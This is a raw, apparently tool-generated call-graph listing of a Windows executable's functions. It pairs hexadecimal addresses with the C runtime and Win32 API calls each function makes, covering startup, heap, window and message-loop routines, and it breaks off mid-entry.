a49edf _doexit 99463->99464 99465 a49f00 99464->99465 99466 a49ee8 99464->99466 99472 a49f21 _doexit 99465->99472 99491 a48a5d 58 API calls 2 library calls 99465->99491 99488 a4a3ab 58 API calls __NMSG_WRITE 99466->99488 99468 a49eed 99489 a4a408 58 API calls 5 library calls 99468->99489 99471 a49f15 99474 a49f1c 99471->99474 99475 a49f2b 99471->99475 99472->99460 99473 a49ef4 99490 a432df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99473->99490 99492 a48d68 58 API calls __getptd_noexit 99474->99492 99478 a49e4b __lock 58 API calls 99475->99478 99480 a49f32 99478->99480 99481 a49f57 99480->99481 99482 a49f3f 99480->99482 99494 a42f95 99481->99494 99493 a4a06b InitializeCriticalSectionAndSpinCount 99482->99493 99485 a49f4b 99500 a49f73 LeaveCriticalSection _doexit 99485->99500 99488->99468 99489->99473 99491->99471 99492->99472 99493->99485 99495 a42f9e RtlFreeHeap 99494->99495 99496 a42fc7 _free 99494->99496 99495->99496 99497 a42fb3 99495->99497 99496->99485 99501 a48d68 58 API calls __getptd_noexit 99497->99501 99499 a42fb9 GetLastError 99499->99496 99500->99472 99501->99499 99502->99447 99503->99448 99504->99451 99508 a49fb5 LeaveCriticalSection 99505->99508 99507 a42ec7 99507->99438 99508->99507 99509 a21066 99514 a2f8cf 99509->99514 99511 a2106c 99512 a42f80 __cinit 67 API calls 99511->99512 99513 a21076 99512->99513 99515 a2f8f0 99514->99515 99547 a40143 99515->99547 99519 a2f937 99520 a277c7 59 API calls 99519->99520 99521 a2f941 99520->99521 99522 a277c7 59 API calls 99521->99522 99523 a2f94b 99522->99523 99524 a277c7 59 API calls 99523->99524 99525 a2f955 99524->99525 99526 a277c7 59 API calls 99525->99526 99527 a2f993 99526->99527 99528 a277c7 59 API calls 99527->99528 99529 a2fa5e 99528->99529 99557 a360e7 99529->99557 99533 a2fa90 99534 a277c7 59 API calls 99533->99534 99535 a2fa9a 99534->99535 99585 a3ffde 99535->99585 99537 a2fae1 99538 a2faf1 GetStdHandle 99537->99538 99539 a649d5 99538->99539 99540 a2fb3d 99538->99540 99539->99540 99542 a649de 99539->99542 99541 a2fb45 OleInitialize 99540->99541 99541->99511 99592 a86dda 64 API calls Mailbox 99542->99592 99544 a649e5 99593 a874a9 CreateThread 99544->99593 99546 a649f1 CloseHandle 99546->99541 99594 a4021c 99547->99594 99550 a4021c 59 API calls 99551 a40185 99550->99551 99552 a277c7 59 API calls 99551->99552 99553 a40191 99552->99553 99554 a27d2c 59 API calls 99553->99554 99555 a2f8f6 99554->99555 99556 a403a2 6 API calls 99555->99556 99556->99519 99558 a277c7 59 API calls 99557->99558 99559 a360f7 99558->99559 99560 a277c7 59 API calls 99559->99560 99561 a360ff 99560->99561 99601 a35bfd 99561->99601 99564 a35bfd 59 API calls 99565 a3610f 99564->99565 99566 a277c7 59 API calls 99565->99566 99567 a3611a 99566->99567 99568 a40ff6 Mailbox 59 API calls 99567->99568 99569 a2fa68 99568->99569 99570 a36259 99569->99570 99571 a36267 99570->99571 99572 a277c7 59 API calls 99571->99572 99573 a36272 99572->99573 99574 a277c7 59 API calls 99573->99574 99575 a3627d 99574->99575 99576 a277c7 59 API calls 99575->99576 99577 a36288 99576->99577 99578 a277c7 59 API calls 99577->99578 99579 a36293 99578->99579 99580 a35bfd 59 API calls 99579->99580 99581 a3629e 99580->99581 99582 a40ff6 Mailbox 59 API calls 99581->99582 99583 a362a5 RegisterWindowMessageW 99582->99583 99583->99533 99586 a75cc3 99585->99586 99587 a3ffee 99585->99587 99604 a89d71 60 API calls 99586->99604 99589 a40ff6 Mailbox 59 API calls 99587->99589 99591 a3fff6 99589->99591 99590 a75cce 99591->99537 99592->99544 99593->99546 99605 a8748f 65 API calls 99593->99605 99595 a277c7 59 API calls 99594->99595 99596 a40227 99595->99596 99597 a277c7 59 API calls 99596->99597 99598 a4022f 99597->99598 99599 a277c7 59 API calls 99598->99599 99600 a4017b 99599->99600 99600->99550 99602 a277c7 59 API calls 99601->99602 99603 a35c05 99602->99603 99603->99564 99604->99590 99606 a2e736 99609 a2d260 99606->99609 99608 a2e744 99610 a2d27d 99609->99610 99627 a2d4dd 99609->99627 99611 a62b0a 99610->99611 99612 a62abb 99610->99612 99632 a2d2a4 99610->99632 99680 a9a6fb 341 API calls __cinit 99611->99680 99613 a62abe 99612->99613 99622 a62ad9 99612->99622 99616 a62aca 99613->99616 99613->99632 99678 a9ad0f 341 API calls 99616->99678 99619 a42f80 __cinit 67 API calls 99619->99632 99620 a62cdf 99620->99620 99621 a2d6ab 99621->99608 99622->99627 99679 a9b1b7 341 API calls 3 library calls 99622->99679 99623 a2d594 99672 a28bb2 68 API calls 99623->99672 99627->99621 99685 a8a0b5 89 API calls 4 library calls 99627->99685 99628 a62c26 99684 a9aa66 89 API calls 99628->99684 99629 a2d5a3 99629->99608 99632->99619 99632->99621 99632->99623 99632->99627 99632->99628 99641 a281a7 59 API calls 99632->99641 99643 a2a000 99632->99643 99666 a288a0 68 API calls __cinit 99632->99666 99667 a286a2 68 API calls 99632->99667 99668 a28620 99632->99668 99673 a2859a 68 API calls 99632->99673 99674 a2d0dc 341 API calls 99632->99674 99675 a29f3a 59 API calls Mailbox 99632->99675 99676 a2d060 89 API calls 99632->99676 99677 a2cedd 341 API calls 99632->99677 99681 a28bb2 68 API calls 99632->99681 99682 a29e9c 60 API calls Mailbox 99632->99682 99683 a76d03 60 API calls 99632->99683 99641->99632 99644 a2a01f 99643->99644 99661 a2a04d Mailbox 99643->99661 99645 a40ff6 Mailbox 59 API calls 99644->99645 99645->99661 99646 a2b5d5 99647 a281a7 59 API calls 99646->99647 99659 a2a1b7 99647->99659 99650 a42f80 67 API calls __cinit 99650->99661 99651 a40ff6 59 API calls Mailbox 99651->99661 99652 a281a7 59 API calls 99652->99661 99653 a6047f 99688 a8a0b5 89 API calls 4 library calls 99653->99688 99655 a277c7 59 API calls 99655->99661 99658 a6048e 99658->99632 99659->99632 99660 a77405 59 API calls 99660->99661 99661->99646 99661->99650 99661->99651 99661->99652 99661->99653 99661->99655 99661->99659 99661->99660 99662 a60e00 99661->99662 99664 a2a6ba 99661->99664 99665 a2b5da 99661->99665 99686 a2ca20 341 API calls 2 library calls 99661->99686 99687 a2ba60 60 API calls Mailbox 99661->99687 99690 a8a0b5 89 API calls 4 library calls 99662->99690 99689 a8a0b5 89 API calls 4 library calls 99664->99689 99691 a8a0b5 89 API calls 4 library calls 99665->99691 99666->99632 99667->99632 99669 a2862b 99668->99669 99670 a28652 99669->99670 99692 a28b13 69 API calls Mailbox 99669->99692 99670->99632 99672->99629 99673->99632 99674->99632 99675->99632 99676->99632 99677->99632 99678->99621 99679->99627 99680->99632 99681->99632 99682->99632 99683->99632 99684->99627 99685->99620 99686->99661 99687->99661 99688->99658 99689->99659 99690->99665 99691->99659 99692->99670 99693 a47e93 99694 a47e9f _doexit 99693->99694 99730 a4a048 GetStartupInfoW 99694->99730 99696 a47ea4 99732 a48dbc GetProcessHeap 99696->99732 99698 a47efc 99699 a47f07 99698->99699 99815 a47fe3 58 API calls 3 library calls 99698->99815 99733 a49d26 99699->99733 99702 a47f0d 99703 a47f18 __RTC_Initialize 99702->99703 99816 a47fe3 58 API calls 3 library calls 99702->99816 99754 a4d812 99703->99754 99706 a47f27 99707 a47f33 GetCommandLineW 99706->99707 99817 a47fe3 58 API calls 3 library calls 99706->99817 99773 a55173 GetEnvironmentStringsW 99707->99773 99710 a47f32 99710->99707 99713 a47f4d 99714 a47f58 99713->99714 99818 a432f5 58 API calls 3 library calls 99713->99818 99783 a54fa8 99714->99783 99717 a47f5e 99718 a47f69 99717->99718 99819 a432f5 58 API calls 3 library calls 99717->99819 99797 a4332f 99718->99797 99721 a47f71 99722 a47f7c __wwincmdln 99721->99722 99820 a432f5 58 API calls 3 library calls 99721->99820 99803 a2492e 99722->99803 99725 a47f90 99726 a47f9f 99725->99726 99821 a43598 58 API calls _doexit 99725->99821 99822 a43320 58 API calls _doexit 99726->99822 99729 a47fa4 _doexit 99731 a4a05e 99730->99731 99731->99696 99732->99698 99823 a433c7 36 API calls 2 library calls 99733->99823 99735 a49d2b 99824 a49f7c InitializeCriticalSectionAndSpinCount __mtinitlocknum 99735->99824 99737 a49d30 99738 a49d34 99737->99738 99826 a49fca TlsAlloc 99737->99826 99825 a49d9c 61 API calls 2 library calls 99738->99825 99741 a49d39 99741->99702 99742 a49d46 99742->99738 99743 a49d51 99742->99743 99827 a48a15 99743->99827 99746 a49d93 99835 a49d9c 61 API calls 2 library calls 99746->99835 99749 a49d98 99749->99702 99750 a49d72 99750->99746 99751 a49d78 99750->99751 99834 a49c73 58 API calls 4 library calls 99751->99834 99753 a49d80 GetCurrentThreadId 99753->99702 99755 a4d81e _doexit 99754->99755 99756 a49e4b __lock 58 API calls 99755->99756 99757 a4d825 99756->99757 99758 a48a15 __calloc_crt 58 API calls 99757->99758 99759 a4d836 99758->99759 99760 a4d8a1 GetStartupInfoW 99759->99760 99761 a4d841 _doexit @_EH4_CallFilterFunc@8 99759->99761 99766 a4d8b6 99760->99766 99770 a4d9e5 99760->99770 99761->99706 99762 a4daad 99849 a4dabd LeaveCriticalSection _doexit 99762->99849 99764 a48a15 __calloc_crt 58 API calls 99764->99766 99765 a4da32 GetStdHandle 99765->99770 99766->99764 99768 a4d904 99766->99768 99766->99770 99767 a4da45 GetFileType 99767->99770 99769 a4d938 GetFileType 99768->99769 99768->99770 99847 a4a06b InitializeCriticalSectionAndSpinCount 99768->99847 99769->99768 99770->99762 99770->99765 99770->99767 99848 a4a06b InitializeCriticalSectionAndSpinCount 99770->99848 99774 a55184 99773->99774 99775 a47f43 99773->99775 99850 a48a5d 58 API calls 2 library calls 99774->99850 99779 a54d6b GetModuleFileNameW 99775->99779 99777 a551aa _memmove 99778 a551c0 FreeEnvironmentStringsW 99777->99778 99778->99775 99780 a54d9f _wparse_cmdline 99779->99780 99782 a54ddf _wparse_cmdline 99780->99782 99851 a48a5d 58 API calls 2 library calls 99780->99851 99782->99713 99784 a54fc1 __NMSG_WRITE 99783->99784 99785 a54fb9 99783->99785 99786 a48a15 __calloc_crt 58 API calls 99784->99786 99785->99717 99787 a54fea __NMSG_WRITE 99786->99787 99787->99785 99789 a48a15 __calloc_crt 58 API calls 99787->99789 99790 a55041 99787->99790 99791 a55066 99787->99791 99794 a5507d 99787->99794 99852 a54857 58 API calls 2 library calls 99787->99852 99788 a42f95 _free 58 API calls 99788->99785 99789->99787 99790->99788 99792 a42f95 _free 58 API calls 99791->99792 99792->99785 99853 a49006 IsProcessorFeaturePresent 99794->99853 99796 a55089 99796->99717 99798 a4333b __IsNonwritableInCurrentImage 99797->99798 99876 a4a711 99798->99876 99800 a43359 __initterm_e 99801 a42f80 __cinit 67 API calls 99800->99801 99802 a43378 _doexit __IsNonwritableInCurrentImage 99800->99802 99801->99802 99802->99721 99804 a24948 99803->99804 99814 a249e7 99803->99814 99805 a24982 IsThemeActive 99804->99805 99879 a435ac 99805->99879 99809 a249ae 99891 a24a5b SystemParametersInfoW SystemParametersInfoW 99809->99891 99811 a249ba 99892 a23b4c 99811->99892 99813 a249c2 SystemParametersInfoW 99813->99814 99814->99725 99815->99699 99816->99703 99817->99710 99821->99726 99822->99729 99823->99735 99824->99737 99825->99741 99826->99742 99830 a48a1c 99827->99830 99829 a48a57 99829->99746 99833 a4a026 TlsSetValue 99829->99833 99830->99829 99832 a48a3a 99830->99832 99836 a55446 99830->99836 99832->99829 99832->99830 99844 a4a372 Sleep 99832->99844 99833->99750 99834->99753 99835->99749 99837 a55451 99836->99837 99842 a5546c 99836->99842 99838 a5545d 99837->99838 99837->99842 99845 a48d68 58 API calls __getptd_noexit 99838->99845 99840 a5547c RtlAllocateHeap 99841 a55462 99840->99841 99840->99842 99841->99830 99842->99840 99842->99841 99846 a435e1 DecodePointer 99842->99846 99844->99832 99845->99841 99846->99842 99847->99768 99848->99770 99849->99761 99850->99777 99851->99782 99852->99787 99854 a49011 99853->99854 99859 a48e99 99854->99859 99858 a4902c 99858->99796 99860 a48eb3 _memset __call_reportfault 99859->99860 99861 a48ed3 IsDebuggerPresent 99860->99861 99867 a4a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 99861->99867 99864 a48fba 99866 a4a380 GetCurrentProcess TerminateProcess 99864->99866 99865 a48f97 __call_reportfault 99868 a4c836 99865->99868 99866->99858 99867->99865 99869 a4c840 IsProcessorFeaturePresent 99868->99869 99870 a4c83e 99868->99870 99872 a55b5a 99869->99872 99870->99864 99875 a55b09 5 API calls 2 library calls 99872->99875 99874 a55c3d 99874->99864 99875->99874 99877 a4a714 EncodePointer 99876->99877 99877->99877 99878 a4a72e 99877->99878 99878->99800 99880 a49e4b __lock 58 API calls 99879->99880 99881 a435b7 DecodePointer EncodePointer 99880->99881 99944 a49fb5 LeaveCriticalSection 99881->99944 99883 a249a7 99884 a43614 99883->99884 99885 a4361e 99884->99885 99886 a43638 99884->99886 99885->99886 99945 a48d68 58 API calls __getptd_noexit 99885->99945 99886->99809 99888 a43628 99946 a48ff6 9 API calls __read_nolock 99888->99946 99890 a43633 99890->99809 99891->99811 99893 a23b59 __write_nolock 99892->99893 99894 a277c7 59 API calls 99893->99894 99895 a23b63 GetCurrentDirectoryW 99894->99895 99947 a23778 99895->99947 99897 a23b8c IsDebuggerPresent 99898 a5d4ad MessageBoxA 99897->99898 99899 a23b9a 99897->99899 99901 a5d4c7 99898->99901 99899->99901 99902 a23bb7 99899->99902 99931 a23c73 99899->99931 99900 a23c7a SetCurrentDirectoryW 99903 a23c87 Mailbox 99900->99903 100146 a27373 59 API calls Mailbox 99901->100146 100028 a273e5 99902->100028 99903->99813 99906 a5d4d7 99911 a5d4ed SetCurrentDirectoryW 99906->99911 99908 a23bd5 GetFullPathNameW 99909 a27d2c 59 API calls 99908->99909 99910 a23c10 99909->99910 100044 a30a8d 99910->100044 99911->99903 99914 a23c2e 99915 a23c38 99914->99915 100147 a84c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 99914->100147 100060 a23a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 99915->100060 99918 a5d50a 99918->99915 99921 a5d51b 99918->99921 100148 a24864 99921->100148 99922 a23c42 99924 a23c55 99922->99924 99926 a243db 68 API calls 99922->99926 100068 a30b30 99924->100068 99925 a5d523 99928 a27f41 59 API calls 99925->99928 99926->99924 99930 a5d530 99928->99930 99929 a23c60 99929->99931 100145 a244cb Shell_NotifyIconW _memset 99929->100145 99933 a5d55f 99930->99933 99934 a5d53a 99930->99934 99931->99900 99935 a27e0b 59 API calls 99933->99935 99936 a27e0b 59 API calls 99934->99936 99943 a5d55b GetForegroundWindow ShellExecuteW 99935->99943 99937 a5d545 99936->99937 99939 a27c8e 59 API calls 99937->99939 99941 a5d552 99939->99941 99940 a5d58f Mailbox 99940->99931 99942 a27e0b 59 API calls 99941->99942 99942->99943 99943->99940 99944->99883 99945->99888 99946->99890 99948 a277c7 59 API calls 99947->99948 99949 a2378e 99948->99949 100155 a23d43 99949->100155 99951 a237ac 99952 a24864 61 API calls 99951->99952 99953 a237c0 99952->99953 99954 a27f41 59 API calls 99953->99954 99955 a237cd 99954->99955 100169 a24f3d 99955->100169 99958 a5d3ae 100221 a897e5 99958->100221 99959 a237ee Mailbox 99962 a281a7 59 API calls 99959->99962 99965 a23801 99962->99965 99963 a5d3cd 99964 a42f95 _free 58 API calls 99963->99964 99967 a5d3da 99964->99967 100193 a293ea 99965->100193 99969 a24faa 84 API calls 99967->99969 99971 a5d3e3 99969->99971 99975 a23ee2 59 API calls 99971->99975 99972 a27f41 59 API calls 99973 a2381a 99972->99973 99974 a28620 69 API calls 99973->99974 99976 a2382c Mailbox 99974->99976 99977 a5d3fe 99975->99977 99978 a27f41 59 API calls 99976->99978 99979 a23ee2 59 API calls 99977->99979 99980 a23852 99978->99980 99981 a5d41a 99979->99981 99982 a28620 69 API calls 99980->99982 99983 a24864 61 API calls 99981->99983 99985 a23861 Mailbox 99982->99985 99984 a5d43f 99983->99984 99986 a23ee2 59 API calls 99984->99986 99988 a277c7 59 API calls 99985->99988 99987 a5d44b 99986->99987 99989 a281a7 59 API calls 99987->99989 99990 a2387f 99988->99990 99991 a5d459 99989->99991 100196 a23ee2 99990->100196 99993 a23ee2 59 API calls 99991->99993 99995 a5d468 99993->99995 100001 a281a7 59 API calls 99995->100001 99997 a23899 99997->99971 99998 a238a3 99997->99998 99999 a4313d _W_store_winword 60 API calls 99998->99999 100000 a238ae 99999->100000 100000->99977 100002 a238b8 100000->100002 100003 a5d48a 100001->100003 100004 a4313d _W_store_winword 60 API calls 100002->100004 100005 a23ee2 59 API calls 100003->100005 100006 a238c3 100004->100006 100007 a5d497 100005->100007 100006->99981 100008 a238cd 100006->100008 100007->100007 100009 a4313d _W_store_winword 60 API calls 100008->100009 100010 a238d8 100009->100010 100010->99995 100011 a23919 100010->100011 100013 a23ee2 59 API calls 100010->100013 100011->99995 100012 a23926 100011->100012 100015 a2942e 59 API calls 100012->100015 100014 a238fc 100013->100014 100016 a281a7 59 API calls 100014->100016 100017 a23936 100015->100017 100018 a2390a 100016->100018 100019 a291b0 59 API calls 100017->100019 100020 a23ee2 59 API calls 100018->100020 100021 a23944 100019->100021 100020->100011 100212 a29040 100021->100212 100023 a293ea 59 API calls 100024 a23961 100023->100024 100024->100023 100025 a29040 60 API calls 100024->100025 100026 a23ee2 59 API calls 100024->100026 100027 a239a7 Mailbox 100024->100027 100025->100024 100026->100024 100027->99897 100029 a273f2 __write_nolock 100028->100029 100030 a2740b 100029->100030 100031 a5ee4b _memset 100029->100031 101000 a248ae 100030->101000 100033 a5ee67 GetOpenFileNameW 100031->100033 100035 a5eeb6 100033->100035 100037 a27d2c 59 API calls 100035->100037 100039 a5eecb 100037->100039 100039->100039 100041 a27429 101028 a269ca 100041->101028 100045 a30a9a __write_nolock 100044->100045 101277 a26ee0 100045->101277 100047 a30a9f 100048 a23c26 100047->100048 101288 a312fe 89 API calls 100047->101288 100048->99906 100048->99914 100050 a30aac 100050->100048 101289 a34047 91 API calls Mailbox 100050->101289 100052 a30ab5 100052->100048 100053 a30ab9 GetFullPathNameW 100052->100053 100054 a27d2c 59 API calls 100053->100054 100055 a30ae5 100054->100055 100056 a27d2c 59 API calls 100055->100056 100057 a30af2 100056->100057 100058 a650d5 _wcscat 100057->100058 100059 a27d2c 59 API calls 100057->100059 100059->100048 100061 a23ac2 LoadImageW RegisterClassExW 100060->100061 100062 a5d49c 100060->100062 101292 a23041 7 API calls 100061->101292 101293 a248fe LoadImageW EnumResourceNamesW 100062->101293 100065 a23b46 100067 a239e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 100065->100067 100066 a5d4a5 100067->99922 100069 a650ed 100068->100069 100083 a30b55 100068->100083 101357 a8a0b5 89 API calls 4 library calls 100069->101357 100071 a30e5a 100071->99929 100074 a31044 100074->100071 100076 a31051 100074->100076 100075 a30bab PeekMessageW 100134 a30b65 Mailbox 100075->100134 101355 a311f3 341 API calls Mailbox 100076->101355 100078 a31058 LockWindowUpdate DestroyWindow GetMessageW 100078->100071 100081 a3108a 100078->100081 100080 a652ab Sleep 100080->100134 100084 a66082 TranslateMessage DispatchMessageW GetMessageW 100081->100084 100082 a30e44 100082->100071 101354 a311d0 10 API calls Mailbox 100082->101354 100083->100134 101358 a29fbd 60 API calls 100083->101358 101359 a768bf 341 API calls 100083->101359 100084->100084 100086 a660b2 100084->100086 100086->100071 100087 a6517a TranslateAcceleratorW 100088 a30fa3 PeekMessageW 100087->100088 100087->100134 100088->100134 100089 a30fbf TranslateMessage DispatchMessageW 100089->100088 100090 a30e73 timeGetTime 100090->100134 100091 a65c49 WaitForSingleObject 100093 a65c66 GetExitCodeProcess CloseHandle 100091->100093 100091->100134 100128 a310f5 100093->100128 100094 a30fdd Sleep 100127 a30fee Mailbox 100094->100127 100095 a281a7 59 API calls 100095->100134 100096 a277c7 59 API calls 100096->100127 100097 a40ff6 59 API calls Mailbox 100097->100134 100098 a65f22 Sleep 100098->100127 100101 a40719 timeGetTime 100101->100127 100102 a310ae timeGetTime 101356 a29fbd 60 API calls 100102->101356 100105 a29997 84 API calls 100105->100134 100106 a65fb9 GetExitCodeProcess 100111 a65fe5 CloseHandle 100106->100111 100112 a65fcf WaitForSingleObject 100106->100112 100109 aa61ac 110 API calls 100109->100127 100110 a2b93d 109 API calls 100110->100127 100111->100127 100112->100111 100112->100134 100113 a29fbd 60 API calls 100113->100134 100114 a65c9e 100114->100128 100115 a66041 Sleep 100115->100134 100116 a654a2 Sleep 100116->100134 100118 a27f41 59 API calls 100118->100127 100123 a2a000 314 API calls 100123->100134 100127->100096 100127->100101 100127->100106 100127->100109 100127->100110 100127->100114 100127->100115 100127->100116 100127->100118 100127->100128 100127->100134 101366 a828f7 60 API calls 100127->101366 101367 a29fbd 60 API calls 100127->101367 101368 a28b13 69 API calls Mailbox 100127->101368 101369 a2b89c 341 API calls 100127->101369 101370 a76a50 60 API calls 100127->101370 101371 a854e6 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 100127->101371 101372 a83e91 66 API calls Mailbox 100127->101372 100128->99929 100131 a8a0b5 89 API calls 100131->100134 100132 a29df0 59 API calls Mailbox 100132->100134 100133 a2b89c 314 API calls 100133->100134 100134->100075 100134->100080 100134->100082 100134->100087 100134->100088 100134->100089 100134->100090 100134->100091 100134->100094 100134->100095 100134->100097 100134->100098 100134->100102 100134->100105 100134->100113 100134->100123 100134->100127 100134->100128 100134->100131 100134->100132 100134->100133 100136 a28620 69 API calls 100134->100136 100137 a766f4 59 API calls Mailbox 100134->100137 100138 a659ff VariantClear 100134->100138 100139 a77405 59 API calls 100134->100139 100140 a65a95 VariantClear 100134->100140 100141 a65843 VariantClear 100134->100141 100142 a28e34 59 API calls Mailbox 100134->100142 100143 a27f41 59 API calls 100134->100143 100144 a28b13 69 API calls 100134->100144 101294 a2e580 100134->101294 101301 a2e800 100134->101301 101332 a2f5c0 100134->101332 101352 a2fe40 341 API calls 2 library calls 100134->101352 101353 a231ce IsDialogMessageW GetClassLongW 100134->101353 101360 aa629f 59 API calls 100134->101360 101361 a89c9f 59 API calls Mailbox 100134->101361 101362 a7d9e3 59 API calls 100134->101362 101363 a76665 59 API calls 2 library calls 100134->101363 101364 a28561 59 API calls 100134->101364 101365 a2843f 59 API calls Mailbox 100134->101365 100136->100134 100137->100134 100138->100134 100139->100134 100140->100134 100141->100134 100142->100134 100143->100134 100144->100134 100145->99931 100146->99906 100147->99918 100149 a51b90 __write_nolock 100148->100149 100150 a24871 GetModuleFileNameW 100149->100150 100151 a27f41 59 API calls 100150->100151 100152 a24897 100151->100152 100153 a248ae 60 API calls 100152->100153 100154 a248a1 Mailbox 100153->100154 100154->99925 100156 a23d50 __write_nolock 100155->100156 100157 a27d2c 59 API calls 100156->100157 100162 a23eb6 Mailbox 100156->100162 100159 a23d82 100157->100159 100168 a23db8 Mailbox 100159->100168 100262 a27b52 100159->100262 100160 a27b52 59 API calls 100160->100168 100161 a23e89 100161->100162 100163 a27f41 59 API calls 100161->100163 100162->99951 100165 a23eaa 100163->100165 100164 a27f41 59 API calls 100164->100168 100166 a23f84 59 API calls 100165->100166 100166->100162 100168->100160 100168->100161 100168->100162 100168->100164 100265 a23f84 100168->100265 100271 a24d13 100169->100271 100174 a5dd0f 100177 a24faa 84 API calls 100174->100177 100175 a24f68 LoadLibraryExW 100281 a24cc8 100175->100281 100179 a5dd16 100177->100179 100180 a24cc8 3 API calls 100179->100180 100182 a5dd1e 100180->100182 100307 a2506b 100182->100307 100183 a24f8f 100183->100182 100184 a24f9b 100183->100184 100186 a24faa 84 API calls 100184->100186 100188 a237e6 100186->100188 100188->99958 100188->99959 100190 a5dd45 100315 a25027 100190->100315 100192 a5dd52 100194 a40ff6 Mailbox 59 API calls 100193->100194 100195 a2380d 100194->100195 100195->99972 100197 a23f05 100196->100197 100198 a23eec 100196->100198 100199 a27d2c 59 API calls 100197->100199 100200 a281a7 59 API calls 100198->100200 100201 a2388b 100199->100201 100200->100201 100202 a4313d 100201->100202 100203 a431be 100202->100203 100204 a43149 100202->100204 100747 a431d0 60 API calls 4 library calls 100203->100747 100211 a4316e 100204->100211 100745 a48d68 58 API calls __getptd_noexit 100204->100745 100207 a431cb 100207->99997 100208 a43155 100746 a48ff6 9 API calls __read_nolock 100208->100746 100210 a43160 100210->99997 100211->99997 100213 a5f5a5 100212->100213 100219 a29057 100212->100219 100213->100219 100749 a28d3b 59 API calls Mailbox 100213->100749 100215 a291a0 100748 a29e9c 60 API calls Mailbox 100215->100748 100216 a29158 100217 a40ff6 Mailbox 59 API calls 100216->100217 100220 a2915f 100217->100220 100219->100215 100219->100216 100219->100220 100220->100024 100222 a25045 85 API calls 100221->100222 100223 a89854 100222->100223 100750 a899be 100223->100750 100226 a2506b 74 API calls 100227 a89881 100226->100227 100228 a2506b 74 API calls 100227->100228 100229 a89891 100228->100229 100230 a2506b 74 API calls 100229->100230 100231 a898ac 100230->100231 100232 a2506b 74 API calls 100231->100232 100233 a898c7 100232->100233 100234 a25045 85 API calls 100233->100234 100235 a898de 100234->100235 100236 a4594c __crtCompareStringA_stat 58 API calls 100235->100236 100237 a898e5 100236->100237 100238 a4594c __crtCompareStringA_stat 58 API calls 100237->100238 100239 a898ef 100238->100239 100240 a2506b 74 API calls 100239->100240 100241 a89903 100240->100241 100242 a89393 GetSystemTimeAsFileTime 100241->100242 100243 a89916 100242->100243 100244 a8992b 100243->100244 100245 a89940 100243->100245 100246 a42f95 _free 58 API calls 100244->100246 100247 a899a5 100245->100247 100248 a89946 100245->100248 100249 a89931 100246->100249 100251 a42f95 _free 58 API calls 100247->100251 100756 a88d90 100248->100756 100252 a42f95 _free 58 API calls 100249->100252 100255 a5d3c1 100251->100255 100252->100255 100254 a42f95 _free 58 API calls 100254->100255 100255->99963 100256 a24faa 100255->100256 100257 a24fb4 100256->100257 100258 a24fbb 100256->100258 100259 a455d6 __fcloseall 83 API calls 100257->100259 100260 a24fca 100258->100260 100261 a24fdb FreeLibrary 100258->100261 100259->100258 100260->99963 100261->100260 100263 a27faf 59 API calls 100262->100263 100264 a27b5d 100263->100264 100264->100159 100266 a23f92 100265->100266 100270 a23fb4 _memmove 100265->100270 100269 a40ff6 Mailbox 59 API calls 100266->100269 100267 a40ff6 Mailbox 59 API calls 100268 a23fc8 100267->100268 100268->100168 100269->100270 100270->100267 100320 a24d61 100271->100320 100274 a24d3a 100276 a24d53 100274->100276 100277 a24d4a FreeLibrary 100274->100277 100275 a24d61 2 API calls 100275->100274 100278 a4548b 100276->100278 100277->100276 100324 a454a0 100278->100324 100280 a24f5c 100280->100174 100280->100175 100482 a24d94 100281->100482 100284 a24ced 100286 a24d08 100284->100286 100287 a24cff FreeLibrary 100284->100287 100285 a24d94 2 API calls 100285->100284 100288 a24dd0 100286->100288 100287->100286 100289 a40ff6 Mailbox 59 API calls 100288->100289 100290 a24de5 100289->100290 100486 a2538e 100290->100486 100292 a24df1 _memmove 100293 a24e2c 100292->100293 100294 a24f21 100292->100294 100295 a24ee9 100292->100295 100296 a25027 69 API calls 100293->100296 100500 a89ba5 95 API calls 100294->100500 100489 a24fe9 CreateStreamOnHGlobal 100295->100489 100300 a24e35 100296->100300 100299 a2506b 74 API calls 100299->100300 100300->100299 100301 a24ec9 100300->100301 100303 a5dcd0 100300->100303 100495 a25045 100300->100495 100301->100183 100304 a25045 85 API calls 100303->100304 100305 a5dce4 100304->100305 100306 a2506b 74 API calls 100305->100306 100306->100301 100308 a5ddf6 100307->100308 100309 a2507d 100307->100309 100524 a45812 100309->100524 100312 a89393 100722 a891e9 100312->100722 100314 a893a9 100314->100190 100316 a25036 100315->100316 100317 a5ddb9 100315->100317 100727 a45e90 100316->100727 100319 a2503e 100319->100192 100321 a24d2e 100320->100321 100322 a24d6a LoadLibraryA 100320->100322 100321->100274 100321->100275 100322->100321 100323 a24d7b GetProcAddress 100322->100323 100323->100321 100326 a454ac _doexit 100324->100326 100325 a454bf 100373 a48d68 58 API calls __getptd_noexit 100325->100373 100326->100325 100328 a454f0 100326->100328 100343 a50738 100328->100343 100329 a454c4 100374 a48ff6 9 API calls __read_nolock 100329->100374 100332 a454f5 100333 a454fe 100332->100333 100334 a4550b 100332->100334 100375 a48d68 58 API calls __getptd_noexit 100333->100375 100336 a45535 100334->100336 100337 a45515 100334->100337 100358 a50857 100336->100358 100376 a48d68 58 API calls __getptd_noexit 100337->100376 100339 a454cf _doexit @_EH4_CallFilterFunc@8 100339->100280 100344 a50744 _doexit 100343->100344 100345 a49e4b __lock 58 API calls 100344->100345 100356 a50752 100345->100356 100346 a507c6 100378 a5084e 100346->100378 100347 a507cd 100383 a48a5d 58 API calls 2 library calls 100347->100383 100350 a50843 _doexit 100350->100332 100351 a507d4 100351->100346 100384 a4a06b InitializeCriticalSectionAndSpinCount 100351->100384 100354 a49ed3 __mtinitlocknum 58 API calls 100354->100356 100355 a507fa EnterCriticalSection 100355->100346 100356->100346 100356->100347 100356->100354 100381 a46e8d 59 API calls __lock 100356->100381 100382 a46ef7 LeaveCriticalSection LeaveCriticalSection _doexit 100356->100382 100366 a50877 __wopenfile 100358->100366 100359 a50891 100389 a48d68 58 API calls __getptd_noexit 100359->100389 100361 a50896 100390 a48ff6 9 API calls __read_nolock 100361->100390 100363 a45540 100377 a45562 LeaveCriticalSection LeaveCriticalSection _fseek 100363->100377 100364 a50aaf 100386 a587f1 100364->100386 100366->100359 100372 a50a4c 100366->100372 100391 a43a0b 60 API calls 3 library calls 100366->100391 100368 a50a45 100368->100372 100392 